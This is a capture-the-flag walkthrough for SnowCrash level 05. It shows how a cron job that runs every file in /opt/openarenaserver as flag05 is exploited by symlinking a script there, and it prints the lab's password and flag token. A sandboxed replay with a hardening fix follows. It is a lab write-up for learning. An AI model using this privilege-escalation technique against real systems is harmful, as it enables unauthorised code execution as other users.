Level 05
How to log in
username: level05
password: ne2searoevaevoem4ov4ar8ap
Goal
run getflag as user flag05
Actually doing something
```
level05@snowcrash.local.maix.me's password:
You have new mail.
level05@SnowCrash:~$
```
This is weird, the only mail I have is my chain mail!
Jokes aside, looking at the files in the user's home, there is nothing other than the default ones.
This reeks of an old program though: nobody checks mail directly at login like this anymore, so something on the box must be writing mail to this user.
Local mail is delivered to a per-user spool file under /var/mail (or /var/spool/mail), so let's check it:
```
level05@SnowCrash:~$ ll /var/mail/level05
-rw-r--r--+ 1 root mail 58 Jan 19 13:44 /var/mail/level05
level05@SnowCrash:~$ cat /var/mail/level05
*/2 * * * * su -c "sh /usr/sbin/openarenaserver" - flag05
```
Oh wow, this looks like a nice cronjob (the file is root-owned but world-readable, and the trailing `+` on the mode means it also carries an ACL).
If we decipher the old text, we get something like this:
Every two minutes (at minutes 0, 2, 4, etc.) run the command
`su -c "sh /usr/sbin/openarenaserver" - flag05`
`su` switches to another user: `flag05` is the target user, `-c "..."` tells su to run that command through flag05's shell instead of opening an interactive one, and the bare `-` asks for a login shell, so the command gets flag05's environment rather than the caller's. Since cron runs the job as root, su does not prompt for a password.
So this runs /usr/sbin/openarenaserver every two minutes as the user flag05.
Let's read that script:
lets read that script
```
level05@SnowCrash:~$ cat /usr/sbin/openarenaserver
#!/bin/sh
for i in /opt/openarenaserver/* ; do
(ulimit -t 5; bash -x "$i")
rm -f "$i"
done
```
It runs every file present in /opt/openarenaserver with `bash -x` (so with a shell trace on stderr), limits each one to 5 s of CPU time with `ulimit -t 5`, and then removes the file. Everything in that loop happens as flag05, so whoever can create a file in /opt/openarenaserver gets code executed as flag05; a quick `ls -ld /opt/openarenaserver` tells you whether level05 can write there.
Let's try adding a little script there, something that dumps the output of getflag to a place we can read:
```
level05@SnowCrash:~$ cat <<EOF >/tmp/getflag05
> #!/bin/sh
> getflag >/tmp/flag05
> chmod +r /tmp/flag05
> EOF
level05@SnowCrash:~$ chmod a+rx /tmp/getflag05
level05@SnowCrash:~$ ln -s /tmp/getflag05 /opt/openarenaserver/flag
level05@SnowCrash:~$ sleep 120 && cat /tmp/flag05
Check flag.Here is your token : viuaaale9huek52boumoomioc
```
And voilà! We had to write the result to a file because the job's stdout and stderr never reach us: cron collects whatever the command prints and mails it to the job's owner, not to level05. The `chmod +r` matters because /tmp/flag05 is created as flag05 with flag05's umask, and the symlink trick works because `bash -x` follows the link while `rm -f` only deletes the link in /opt/openarenaserver, leaving /tmp/getflag05 in place.
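The whole mechanism, reproduced as an added example that is not part of the original write-up or of the SnowCrash VM: the original loop is run against a scratch directory created with mktemp, a constructed payload records which user ran it in place of getflag, and a hardened variant of the loop is included as an assumption about how one could fix the script (nothing shipped with the challenge does this). All paths are temporary; it assumes GNU stat and bash on PATH.

```shell
#!/bin/sh
# Added example: replay the /usr/sbin/openarenaserver loop in a scratch directory
# so the vulnerable pattern (a privileged job executing whatever it finds in a
# directory other users can write to) can be watched without cron, su or flag05.
# Paths come from mktemp, the payload is constructed here, and run_spool_checked
# is an assumed hardening, not the challenge's code. Needs GNU stat -c and bash.

# Verbatim loop from the original script, with the spool directory as a
# parameter. The [ -e ] guard only skips the literal glob on an empty directory.
run_spool() {
    spool="$1"
    for i in "$spool"/* ; do
        [ -e "$i" ] || continue
        (ulimit -t 5; bash -x "$i")
        rm -f "$i"
    done
}

# What level05 drops in the spool. The original used 'getflag >/tmp/flag05';
# this constructed payload records which user ran it instead. $out is expanded
# now, $(id -un) is escaped so it expands when the payload itself runs.
drop_payload() {
    spool="$1"; out="$2"
    cat <<EOF >"$spool/flag"
#!/bin/sh
echo "ran as \$(id -un)" >"$out"
chmod +r "$out"
EOF
}

# Drop the payload, run the loop once as the cron job would, print what the
# payload wrote. The bash -x trace goes to stderr; on the box cron mailed it to
# the job's owner, so it is discarded here too.
exploit_demo() {
    work=$(mktemp -d)
    spool="$work/openarenaserver"
    mkdir "$spool"
    drop_payload "$spool" "$work/result"
    run_spool "$spool" 2>/dev/null
    cat "$work/result"
    if [ -e "$spool/flag" ]; then echo "payload still present"; fi
    rm -rf "$work"
}

# Assumed hardening: refuse the whole spool unless it is root-owned and not
# writable by group/other, and drop symlinks so the file executed must really
# live inside the spool. Returns 2 when the directory is rejected.
run_spool_checked() {
    spool="$1"
    owner=$(stat -c '%u' "$spool")
    perms=$(stat -c '%a' "$spool")
    if [ "$owner" -ne 0 ] || [ $(( 0$perms & 022 )) -ne 0 ]; then
        echo "refusing $spool: owner uid $owner, mode $perms" >&2
        return 2
    fi
    for i in "$spool"/* ; do
        [ -e "$i" ] || continue
        if [ -L "$i" ]; then rm -f "$i"; continue; fi
        (ulimit -t 5; bash -x "$i")
        rm -f "$i"
    done
}

# Run the check against a world-writable scratch directory, the situation that
# makes the level solvable. Prints "rejected" or "accepted".
hardened_demo() {
    d=$(mktemp -d)
    chmod 777 "$d"
    if run_spool_checked "$d" 2>/dev/null; then echo accepted; else echo rejected; fi
    rm -rf "$d"
}

exploit_demo
hardened_demo
```

Run it as yourself: exploit_demo prints "ran as <your user>" (there is no flag05 on your machine) and nothing else, which shows the dropped file was executed and then removed exactly as on the VM; hardened_demo prints "rejected" because the scratch spool is writable by everyone.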